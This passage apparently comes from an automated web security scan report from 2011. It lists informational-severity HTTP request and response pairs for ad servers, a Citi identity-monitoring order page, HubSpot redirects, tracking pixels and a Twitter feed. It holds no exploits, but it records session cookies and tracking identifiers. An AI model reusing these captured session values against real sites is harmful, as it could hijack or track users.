var ox_swf = new FlashObject('http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/efb/efb89dc478c1e3ed5a981c61a2475ee4.swf', 'Advertisement', '728', '90', '8');
ox_swf.addVariable('clickTARGET', '_blank');
ox_swf.addVariable('clickTAG', 'http%3A%2F%2Fd.w55c.net%2Fck.php%3Foaparams%3D2__bannerid%3D750__zoneid%3D768__OXLCA%3D1__cb%3D09f5497279__r_id%3D02cca2bec6220e612be93de97e65b9a1__r_ts%3Dlk5x8r__oadest%3Dhttp%253A%252F%252Fwww.dallasareamazda.com%253Futm_source%253Ddataxu%2526utm_medium%253Ddisplay%2526utm_campaign%253DmazdaCX9%2526so_utm%253D46fa0bac2e96ffe1ea882f640b8318e5');

ox_swf.addParam('allowScriptAccess','always');
ox_swf.write('ox_7b059c0c1d35ec0ee254d91fc5d9144d');
if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute('version'))) { document.write("<div id='beacon_09f5497279' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.w55c.net/lg.php?bannerid=750&amp;campaignid=74&amp;zoneid=768&amp;loc=http%3A%2F%2Fcdn.w55c.net%2Fi%2F0RuFuATqDZ_452086828.html%3Frtbhost%3Drts-rr13.sldc.dataxu.net%26btid%3DNERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw%26ei%3DGOOGLE_CONTENTNETWORK%26wp_exchange%3DTbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ%26euid%3DQ0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn%26slotid%3DM
...[SNIP]...

Request 2

GET /afr.php?zoneid=768&cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response 2

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=739a694ab95aeb17ec2a4003deee1587; expires=Mon, 23-Apr-2012 15:19:40 GMT; path=/
Content-Length: 2965
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<div id='ox_bcad15e31907b2ae96e6ea2ddc01eb98' style='display: inline;'><a href='http://d.w55c.net/ck.php?oaparams=2__bannerid=750__zoneid=768__OXLCA=1__cb=8ecba44b97__r_id=0147f6beaf9cf01089eada16fdf5acdb__r_ts=lk5x8s__oadest=http%3A%2F%2Fwww.dallasareamazda.com%3Futm_source%3Ddataxu%26utm_medium%3Ddisplay%26utm_campaign%3DmazdaCX9%26so_utm%3D46fa0bac2e96ffe1ea882f640b8318e5' target='_blank'><img src='http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/f21/f217ad5fe4a807573e356cc4a195fc47.gif' width='728' height='90' alt='' title='' border='0' /></a></div>
<script type='text/javascript'><!--// <![CDATA[
var ox_swf = new FlashObject('http://i.xx.openx.com/942/9420ae6abc0b141cd8a7df1a2c5156db8f33f2a8/efb/efb89dc478c1e3ed5a981c61a2475ee4.swf', 'Advertisement', '728', '90', '8');
ox_swf.addVariable('clickTARGET', '_blank');
ox_swf.addVariable('clickTAG', 'http%3A%2F%2Fd.w55c.net%2Fck.php%3Foaparams%3D2__bannerid%3D750__zoneid%3D768__OXLCA%3D1__cb%3D8ecba44b97__r_id%3D0147f6beaf9cf01089eada16fdf5acdb__r_ts%3Dlk5x8s__oadest%3Dhttp%253A%252F%252Fwww.dallasareamazda.com%253Futm_source%253Ddataxu%2526utm_medium%253Ddisplay%2526utm_campaign%253DmazdaCX9%2526so_utm%253D46fa0bac2e96ffe1ea882f640b8318e5');

ox_swf.addParam('allowScriptAccess','always');
ox_swf.write('ox_bcad15e31907b2ae96e6ea2ddc01eb98');
if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute('version'))) { document.write("<div id='beacon_8ecba44b97' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.w55c.net/lg.php?bannerid=750&amp;campaignid=74&amp;zoneid=768&amp;cb=8ecba44b97&amp;r_id=0147f6beaf9cf01089eada16fdf5acdb&amp;r_ts=lk5x8s' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"); } else { document.write("<div id='beacon_8ecba44b97' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.w55c.net/lg.php?bannerid=750&amp;campaignid=74&amp;zoneid=768&amp;oxfb=1&amp;cb=8ecba44b97&amp;r_id=
...[SNIP]...

21.6. https://membership.identitymonitor.citi.com/pages2/english/neworder.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://membership.identitymonitor.citi.com
Path:   /pages2/english/neworder.asp

Request 1

GET /pages2/english/neworder.asp?source=IMN00518&ordsrc= HTTP/1.1
Host: membership.identitymonitor.citi.com
Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_p7%3Dno%2520value%7C1303676167327%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dundefined%255E%255Ehttp%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255Eundefined%2520%257C%2520http%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255E%3B%20s_sq%3Dprod%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.identitymonitor.citi.com%2525252F%252526oid%25253Dhttps%2525253A%2525252F%2525252Fmembership.identitymonitor.citi.com%2525252Fpages2%2525252Fenglish%2525252Fneworder.asp%2525253Fsource%2525253DIMN00518%25252526ordsrc%2525253D%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3385
Content-Type: text/html;charset=ISO-8859-1
Expires: Sun, 24 Apr 2011 03:28:46 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCEDSBRSR=BPBAFOOBCBCJBCIBHDGNANJD; secure; path=/
Date: Sun, 24 Apr 2011 20:07:46 GMT

<html><head></head><body><form name=formt action='https://membership.identitymonitor.citi.com/Switch.aspx' method=post><input type=hidden name='RELXDATA' value='28E5E72B22048B8DF7D88C2AD30A3DAE8C51B284AFAA7754DBDA3AAC4EA5BF7FB50DAC6A8AE8756885A9DEDF3C36B7ECC11E4888FA0362C488627E505113A5BCF81F399272D2BDB1E0CFE373E059FFD07F43F972B91522371292675C0C574CE6A8E22C814A76C341069AD1BFBBF2787EC425E4A67062A48E9DAD7F71C0E4ADD989717B63DAB8A4A5AD8B27B5E77A49E3D48411A50887463CBC0C2E6C3B0FF9B97226E6BE1BD8916C92066F8C9D0BFA0DC3E117F2C6AA4E03D52F2C359A8B3474E754ED59212C07C393E9383C3EDB7094CE55D1F1D9A879C2B25F7A9786EE95EF0C04F840FDC3E2874B3903101C3F51D236EBD710D9F404A55241AE5744DD04C1B7D16E4D391E2EE945086CF7F055BAB72FEE399630AD32E8A93FF405CBC626412F92EE68134034312645B7F67653688062616090FB573F06BA92E5C83F706A98847FC84EBE881465802A71838A74A3CD228828E51F056ABFFB29E54EF7B030771AF2ABA65595FC761B41E5B1B152A1B5CF555897659E326BE56B84A1C7CC1B94834C6CCE3F65513CA807DC5EC11D651CD05D0E6973B70E5F8CAEA5A2DD49EAB4F42BFC4908F27FE0C2DCD01906037BD92181D1930E5F395731B584B40777F52D38C0D6504380F9493E1B6D4A975847298F04AE4F384C5BE011E3261284D1288A6C1B02CB72490C7183EA90F1FF394F58958DBAEDF70CB095939E908E52AC0A65C2EC833C15FFC87F47AE09B94F36D3A03C37191BCB87125A58C7070A6E9581C05F9BFAE50BABFAFB84E5986D3F96E6FFF5E598F571063118E9E769A1277637C5B10A8CEF9EE6AA452604B84FE89F0520338F378BB2D8D79B062818BF0F51B5F0BA233BA96CF04063745DB13F796C82E6C9272C0155474AFB041689D2747AC70F025976185EBAF61519ACA913A4CBDCA5AD16A086B7698C0835B2BFFA441CC71C5442117E1F3353A0969C1DB795192F34BE25DD3058B3936791E6FFF031DAEDBA9CBF3A86759BF6F43C4B1488EDD66B37D232556E5E2FF9541ED8922F0C85459072EB8326E653C18F595381B2286E96556DD69699EEA6B6D2B880D3226304839603DAACAC4AA496C6CA13EC69BD4FDB184A18AD14341BA0249EDD9574C8830814E5CC1FACD2E197937C6B928C9E5B09D69E8BB0E8C9D67D663090192A9747C9E04ACF46A41851D767F27933B7990237DBE6ED241085A7321F2F8586FA29BCD60DA9513D2A875C9D960F00564F3561A2B8AEDB6901741253CAD48FE344CDCD3EFFDA410A351D626817AD2FC9CECA930299EE0127C3442CFF2B4711B7F884341A57272235E53798CEF9BCEA56A2E0B0C01FC8B32A5B9D5234FB00367E17F6E3881613151A7A819FDE45E4AA61117CD13BD35EAB830BB06E4B25E580A9709E55582F61ADB0367D945F22
...[SNIP]...

Request 2

GET /pages2/english/neworder.asp?source=IMN00518&ordsrc= HTTP/1.1
Host: membership.identitymonitor.citi.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_p7%3Dno%2520value%7C1303676167327%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dundefined%255E%255Ehttp%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255Eundefined%2520%257C%2520http%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255E%3B%20s_sq%3Dprod%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.identitymonitor.citi.com%2525252F%252526oid%25253Dhttps%2525253A%2525252F%2525252Fmembership.identitymonitor.citi.com%2525252Fpages2%2525252Fenglish%2525252Fneworder.asp%2525253Fsource%2525253DIMN00518%25252526ordsrc%2525253D%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3257
Content-Type: text/html;charset=ISO-8859-1
Expires: Sun, 24 Apr 2011 03:29:10 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCEDSBRSR=PPBAFOOBPBIKIFMOODLIKEIB; secure; path=/
Date: Sun, 24 Apr 2011 20:08:10 GMT

<html><head></head><body><form name=formt action='https://membership.identitymonitor.citi.com/Switch.aspx' method=post><input type=hidden name='RELXDATA' value='B20D66E47D3F329EEA094D76A6766A844D9FE56606DBB8ED032F02D9C0ABA1166FBA80EE58067E35816BED422E551F51116E368D8AB171E1D61EB4176B4B29D164FA62C7C2CA684B8669FA8ECABFC55E17BE6DDFEDCBEC46943C0D49226CE7215E239D4E329F3281B4535856D662B30E930F966CFE9292EEAA89CEFD9131CC74EFD7B374CEAEAFF56AD751CD3495F91006DE6AFA075A55074BF913EF95D7C55D14F8ECF06A3DEF580B34813C1F9C9F96F0A9EEB7024031D9DD28EDD856D44FF3EE35521FFFB5931BEF34196A55B6BB87A9E924E11C4CC228CE6EA8FBB43054AE899ABFA3FF1441D8964D092CF6B9C867AFEFC0FCA11C58BEC68CC6E27DECD9672FE6FADE4669535D36023F47B0270F061E41D2E0845DAAB24736840B7EE0A12B4FD286EDE0BBBB7BC55993FA4A33B4BF42BA7C5E571D709597C0D671779A6243F0414426912E2A859EE4BF6A1184DD7120DA3E880B0A1CEB794B50745F96417AE65481424FFEC118AB516114D26A50C14915FB0F9B7BB4F0C018994FDD349E20E408C07FA88AE7D67305359B427FA18B59E86B7C7DEF5FB73C43F25343220DE70908DAAC047E6FF4B8283022717E041CC2627CD9A9B7179B6DCF4095AC85E5987C5A13AD958C1E3214F02909AA3BC2A683D2DD560642389764BC07047D71740CD536D1A2C36A53B19B75829BD23AB5B9BAF05393CBA6984863C14281589E43A539ADD7284D3DA85923340DEB3732FAE3F14EB1330A6526670E5DC185051DCA2007707C349A475BCFB00B61FE3878C19C847FD2C642CCBEFCFD70E18A97170C7E70E1A54B2A7B397469269C926F675A4D80A8531000D096B242DF68D51A0974D25184D95BC5D2B022B971A00DE699B6A14406F7C0C74A5E276B834A34A83A5E8A7210AC18D23734E2EC2B25ACFE3B68304441A5352ED7A074AFCAFDD6D950ED01FAC8678ECF08A3C028A701257B567235D44A17E187EAF4BA21F47011335AB748FA8D4F6C1A5DD2FB3E94563B9067E7FC8E2544D048FF8DFEC7A003BD01D62F58A0F717C1AFB6D28CFC8683D6EB8889FF7F7D9C648B488339D5925CD93891D4B90F87CBB1160967AC965CB32F6275AD66D9CD85CB636B5C909511500EB96724974B928D903CBC30C8ADB912AD6CAD4705C9FAF6280A154C38146091AB4BBCC2DCC72723766D4FAC7D002874A6798D49D07DF210D525C7AB7B69DD258232841A060A7265C894C4732A9BA053D08DBDE9B16A4215D2293D8A5D4FEE750E19D7C1A96119A9856E4F31B0FD03EA20C0AC1F09FF79E32A8E9B830B12F92DED7998F7ACE447616E8DFCFFBF92819977FE290D1DD8A596D1EBB2E8309E55C8E5AE6E96FEE7B55873CC1DAF56AE06516D42CC28825A612DA4BE661031DD38A3AA9DE1DBD6E58C7E6C8BFFBEC3
...[SNIP]...

21.7. http://positivesearches1.app6.hubspot.com/Inactive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://positivesearches1.app6.hubspot.com
Path:   /Inactive.aspx

Request 1

GET /Inactive.aspx?type=18 HTTP/1.1
Host: positivesearches1.app6.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=0KM0zrEhzQEkAAAAZTQwOGU2MTAtMGU3Ni00MDM2LTg1MTEtMDIxNzk3YzIyY2My0; hubspotutk=a2dd46d8-2ea8-43a4-bfe0-4b8ea6578157; HUBSPOT39=252777644.0.0000

Response 1

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 00:33:04 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=68376&redirectToNewPortalDomain=http%3a%2f%2fwww.positivesearchresults.com%2f%3fgclid%3dCM3Ir8m1tqgCFcPd4AodKWFhDw
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 285

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=68376&amp;redirectToNewPortalDomain=http%3a%2f%2fwww.positivesearchresults.com%2f%3fgclid%3dCM3Ir8m1tqgCFcPd4AodKWFhDw">here</a>.</h2>
</body></html>

Request 2

GET /Inactive.aspx?type=18 HTTP/1.1
Host: positivesearches1.app6.hubspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=0KM0zrEhzQEkAAAAZTQwOGU2MTAtMGU3Ni00MDM2LTg1MTEtMDIxNzk3YzIyY2My0; hubspotutk=a2dd46d8-2ea8-43a4-bfe0-4b8ea6578157; HUBSPOT39=252777644.0.0000

Response 2

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 00:33:06 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://signup.hubspot.com/setup/billing?portalId=68376&redirectToNewPortalDomain=http%3a%2f%2fpositivesearches1.app6.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 305

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=68376&amp;redirectToNewPortalDomain=http%3a%2f%2fpositivesearches1.app6.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard">here</a>.</h2>
</body></html>

21.8. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Request 1

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:37 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSozqDFNLbEyLLQwLkyxMrQyUKoFAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:37 GMT
Set-Cookie: vsd=0@1@4db48bb5@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:45:05 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83rUgvqTFNLbEyLLQwLjK1MrQyUKoFAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:45:05 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:45:05 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.9. http://twitter.com/statuses/user_timeline/PrivacyGuard.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/PrivacyGuard.json

Request 1

GET /statuses/user_timeline/PrivacyGuard.json?callback=twitterCallback2&count=2 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.privacyguard.com/?ref=P158PGDTCSD0007
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1303141668067295; guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:53:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303692826-42522-823
X-RateLimit-Limit: 150
ETag: "a6b94834b7e908b36e6269c9b07e6639"-gzip
Last-Modified: Mon, 25 Apr 2011 00:53:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01314
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1146c459667
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303695272
Set-Cookie: original_referer=ZLhHHTiegr%2FpCYvqQuqxRmS0bryNnltYal5DIOcfO%2FuMwRX9CclKmgZ05fTnqRsBFXD47bK79ak%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCE7WJYovAToHaWQiJTUyODBiNmVlNGFhN2Y3%250ANGQ5MDRlZjVhZDczYzM2MTJmIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--4a2b9e5622d64394b4083163494f4edc5dfb6d07; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 3756

twitterCallback2([{"text":"The New Ways Thieves Are Stealing Your Identity: http:\/\/t.co\/2CGbAGa via @forbes. All the more reason to make sure you are protected!","geo":null,"in_reply_to_status_id":null,"truncated":false,"created_at":"Tue Apr 19 21:09:36 +0000 2011","retweet_count":0,"in_reply_to_user_id":null,"id_str":"60449995551293440","place":null,"favorited":false,"source":"\u003Ca href=\"http:\/\/twitter.com\/tweetbutton\" rel=\"nofollow\"\u003ETweet Button\u003C\/a\u003E","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_user_id_str":null,"user":{"contributors_enabled":false,"profile_background_color":"9AE4E8","profile_background_image_url":"http:\/\/a2.twimg.com\/profile_background_images\/4771620\/pg-twitter-bg.gif","created_at":"Mon Feb 23 21:44:24 +0000 2009","description":"A comprehensive credit reporting, monitoring and identity theft protection service helping you maintain control over your most critical information","follow_request_sent":null,"lang":"en","notifications":null,"favourites_count":0,"id_str":"21697583","profile_text_color":"333333","profile_sidebar_fill_color":"DDFFCC","profile_image_url":"http:\/\/a3.twimg.com\/profile_images\/82248558\/twitter-icon_normal.PNG","is_translator":false,"show_all_inline_media":false,"geo_enabled":false,"profile_background_tile":false,"listed_count":10,"url":"http:\/\/www.privacyguard.com","screen_name":"PrivacyGuard","defau
...[SNIP]...

Request 2

GET /statuses/user_timeline/PrivacyGuard.json?callback=twitterCallback2&count=2 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1303141668067295; guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:53:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303692831-92480-19884
X-RateLimit-Limit: 150
ETag: "a6b94834b7e908b36e6269c9b07e6639"-gzip
Last-Modified: Mon, 25 Apr 2011 00:53:51 GMT
X-RateLimit-Remaining: 127
X-Runtime: 0.01300
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1146c459667
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303695272
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCI7pJYovAToHaWQiJWZlZGQ5ODllOWEzYmYx%250AY2FhMWNiODAwZWJjYjZjYmRmIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0a60ae50c4b467871bedbe6dbe999fd983ffe615; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 3756

